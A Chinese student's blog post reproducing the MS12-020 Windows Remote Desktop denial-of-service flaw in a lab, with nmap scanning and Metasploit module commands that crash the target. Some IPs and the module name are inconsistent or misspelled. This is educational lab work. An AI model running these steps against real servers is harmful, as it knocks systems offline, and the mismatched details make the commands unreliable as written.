✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :内网安全-漏洞复现
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
一、原理
ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统,Windows在处理某些RDP报文时Terminal Server 存在错误,可被利用造成服务停止响应(蓝屏)
根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。
微软的安全公告:Windows全系列操作系统(WinXP/Vista/Win7/Win2000/ Win2003/Win2008)均存在受控威胁。
二、实验环境
攻击机:kali IP:192.168.204.128
靶机win2003 IP:192. 168.204.159
靶机win2007 IP:192.168.204.160
两者都在同一内网,采用NAT连接方式
三、漏洞复现
1、开启win2003的远程桌面:控制面板–>系统–>远程–>远程协助–>远程桌面
win2007是 计算机–>(右键)属性–>远程设置
2、控制面板–>windows防火墙–>例外–>远程桌面
3、用nmap扫描靶机,发现靶机的3389端口已经打开
输入:nmap 192.168.252.159
4、在kali的终端中打开msfconsole
5、使用search功能搜索ms12-020,发现有两个可用模块。
输入:search ms12-020
6、使用第一个可用版模块
输入:use auxiliary/dos/windows/rdp/ma12_020_maxchannelids
或者use 1
7、利用set命令设置攻击的IP。
输入:set rhosts 192.168.252.160
show options
8、输入:exploit
,执行攻击
9、看一下靶机,发现靶机蓝屏了
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/35274.html